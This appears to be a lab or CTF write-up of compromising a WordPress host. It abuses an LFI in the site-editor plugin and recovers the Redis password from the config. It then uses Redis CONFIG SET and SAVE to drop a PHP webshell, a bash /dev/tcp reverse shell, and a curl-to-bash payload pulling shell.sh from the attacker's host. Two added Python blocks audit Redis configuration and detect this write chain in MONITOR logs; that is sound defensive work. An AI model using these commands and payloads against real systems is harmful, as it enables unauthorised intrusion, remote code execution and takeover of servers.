Exploitation

The site-editor plugin is vulnerable to LFI.

[+] site-editor
 | Location: http://192.168.135.166/wp-content/plugins/site-editor/
 | Latest Version: 1.1.1 (up to date)
 | Last Updated: 2017-05-02T23:34:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.1.1 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.135.166/wp-content/plugins/site-editor/readme.txt

Possible ways to go about this

Find the config file for the WordPress site, which could get us access to the site and let us upload malicious code.

Get hold of the creds for Redis and see what we can do from there.

# Require clients to issue AUTH <PASSWORD> before processing any other
# commands.  This might be useful in environments in which you do not trust
# others with access to the host running redis-server.
#
# This should stay commented out for backward compatibility and because most
# people do not need auth (e.g. they run their own servers).
#
# Warning: since Redis is pretty fast an outside user can try up to
# 150k passwords per second against a good box. This means that you should
# use a very strong password otherwise it will be very easy to break.
#
requirepass Ready4Redis?
192.168.135.166:6379> AUTH Ready4Redis?
OK
192.168.135.166:6379> info
# Server
redis_version:5.0.14
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:ddd3b1f304a7d4d5
redis_mode:standalone
os:Linux 4.19.0-18-amd64 x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:8.3.0
process_id:483
run_id:43b1f5fed3d5c1a189b903ab9c174e00d8b22c48
tcp_port:6379
uptime_in_seconds:4279
uptime_in_days:0
hz:10
configured_hz:10
lru_clock:15476870
executable:/usr/bin/redis-server
config_file:/etc/redis/redis.conf

192.168.135.166:6379> 

So although I already tried to export a PHP file to the /var/www/html directory, the user does not have write access there, so with the LFI we can find what files we have write access to, upload the PHP code and then use the LFI to execute the code.

Documentation=http://redis.io/documentation, man:redis-server(1)

[Service]
Type=forking
ExecStart=/usr/bin/redis-server /etc/redis/redis.conf
PIDFile=/run/redis/redis-server.pid
TimeoutStopSec=0
Restart=always
User=redis
Group=redis
RuntimeDirectory=redis
RuntimeDirectoryMode=2755

UMask=113
PrivateTmp=yes
LimitNOFILE=65535
PrivateDevices=yes
ProtectHome=yes
ReadOnlyDirectories=/
ReadWritePaths=-/var/lib/redis
ReadWritePaths=-/var/log/redis
ReadWritePaths=-/var/run/redis


NoNewPrivileges=true
CapabilityBoundingSet=CAP_SETGID CAP_SETUID CAP_SYS_RESOURCE
MemoryDenyWriteExecute=true
ProtectKernelModules=true
ProtectKernelTunables=true
ProtectControlGroups=true
RestrictRealtime=true
RestrictNamespaces=true
RestrictAddressFamilies=AF_INET AF_INET6 AF_UNIX

# redis-server can write to its own config file when in cluster mode so we
# permit writing there by default. If you are not using this feature, it is
# recommended that you replace the following lines with "ProtectSystem=full".
ProtectSystem=true
ReadWriteDirectories=-/etc/redis
ReadWriteDirectories=-/opt/redis-files

[Install]
WantedBy=multi-user.target
Alias=redis.service
{"success":true,"data":{"output":[]}}
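An added check, not part of the original write-up: the Python below audits a Redis systemd unit and redis.conf for the conditions that make this write primitive possible (a writable directory outside the standard Redis paths, the CONFIG command left usable, no requirepass, Redis bound to all interfaces). The unit and conf excerpts are constructed samples modelled on the output above, and the password value is a placeholder.

```python
EXPECTED_RW = {'/var/lib/redis', '/var/log/redis', '/var/run/redis', '/run/redis', '/etc/redis'}

# Constructed unit excerpt modelled on the one shown above (not the original file).
UNIT_SAMPLE = """\
[Service]
ReadWritePaths=-/var/lib/redis
ReadWritePaths=-/var/log/redis
ReadWriteDirectories=-/etc/redis
ReadWriteDirectories=-/opt/redis-files
ProtectSystem=true
"""

# Constructed redis.conf excerpt; the password is a placeholder, not a real value.
CONF_SAMPLE = """\
bind 0.0.0.0
requirepass PLACEHOLDER_SECRET
# rename-command CONFIG ""
"""

def audit_unit(text):
    """Flag writable paths outside the expected Redis directories and a weak ProtectSystem."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in '#;[':
            continue
        key, _, value = line.partition('=')
        key, value = key.strip(), value.strip()
        if key in ('ReadWritePaths', 'ReadWriteDirectories'):
            for path in (p.lstrip('-+') for p in value.split()):
                if path not in EXPECTED_RW:
                    findings.append(f'{key} grants write access to unexpected path {path}')
        elif key == 'ProtectSystem' and value.lower() not in ('full', 'strict'):
            findings.append(f'ProtectSystem={value} does not cover /etc; prefer full or strict')
    return findings

def audit_conf(text):
    """Flag missing requirepass, a usable CONFIG command and listening on all interfaces."""
    directives = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith('#'):
            name, _, rest = line.partition(' ')
            directives.setdefault(name.lower(), []).append(rest.strip())
    findings = []
    if 'requirepass' not in directives:
        findings.append('no requirepass: any client reaching the port can run CONFIG SET')
    if not any(r.upper().startswith('CONFIG') for r in directives.get('rename-command', [])):
        findings.append('CONFIG not renamed or disabled: dbfilename and dir are changeable at runtime')
    if any('0.0.0.0' in b.split() for b in directives.get('bind', [])):
        findings.append('bind 0.0.0.0: Redis is reachable from all interfaces')
    return findings
```

Run both functions over the real files on a host; every finding corresponds to one link in the chain shown above.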

Based on this I tried to get an interactive shell but was unable to for some reason; however, with these commands and navigating to them I was able to execute commands.

192.168.135.166:6379> config set dbfilename redisss.php
OK
192.168.135.166:6379> set test "<?php system('whoami'); ?>"
OK
192.168.135.166:6379> save

Created a shell that will get executed when I execute the curl command on Redis and navigate to it with the LFI.

#!/bin/bash

bash -i >& /dev/tcp/192.168.49.135/80 0>&1

This is the payload that I used.

set test "<?php system('curl http://192.168.49.135:22/shell.sh | bash'); ?>"
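From the detection side, added here and not part of the original write-up: a Python parser for `redis-cli MONITOR` output that flags the CONFIG SET dbfilename / SET / SAVE chain used above, tracking state per client so an unrelated client's BGSAVE is not reported. The MONITOR lines are a constructed sample.

```python
import re

# Constructed sample of `redis-cli MONITOR` output (not from the original write-up).
# One line per command: <unix-time> [<db> <client-addr>] "<cmd>" "<arg>" ...
SAMPLE_MONITOR = """\
1659639759.100000 [0 192.168.49.135:45210] "config" "set" "dbfilename" "redisss.php"
1659639759.200000 [0 192.168.49.135:45210] "set" "test" "<?php system('whoami'); ?>"
1659639759.300000 [0 192.168.49.135:45210] "save"
1659639800.000000 [0 10.0.0.5:51000] "set" "session:abc" "user=42"
1659639801.000000 [0 10.0.0.5:51000] "bgsave"
"""

LINE_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<addr>\S+)\] (?P<args>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
SCRIPT_EXT = ('.php', '.phtml', '.phar', '.jsp', '.aspx', '.cgi')
SCRIPT_MARKERS = ('<?php', '<?=', '<%')
WRITE_CMDS = ('set', 'setex', 'append', 'rpush', 'lpush', 'hset', 'sadd')

def parse_monitor(text):
    """Yield (timestamp, client, [cmd, arg, ...]) for each well-formed MONITOR line."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield float(m.group('ts')), m.group('addr'), ARG_RE.findall(m.group('args'))

def detect_rdb_webshell_drop(monitor_text):
    """Return (client, finding) tuples for the dbfilename -> script payload -> SAVE chain.

    State is kept per client so an unrelated client's BGSAVE is not reported.
    """
    state = {}
    findings = []
    for _ts, client, args in parse_monitor(monitor_text):
        if not args:
            continue
        cmd = args[0].lower()
        st = state.setdefault(client, {'dbfilename': None, 'script_data': False})
        if cmd == 'config' and len(args) >= 4 and args[1].lower() == 'set':
            if args[2].lower() == 'dbfilename' and args[3].lower().endswith(SCRIPT_EXT):
                st['dbfilename'] = args[3]
                findings.append((client, f'dbfilename changed to script name {args[3]!r}'))
        elif cmd in WRITE_CMDS and any(m in a for a in args[1:] for m in SCRIPT_MARKERS):
            st['script_data'] = True
            findings.append((client, 'script-looking value written to keyspace'))
        elif cmd in ('save', 'bgsave') and (st['dbfilename'] or st['script_data']):
            findings.append((client, f'RDB dump triggered after tampering (file {st["dbfilename"]!r})'))
    return findings
```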
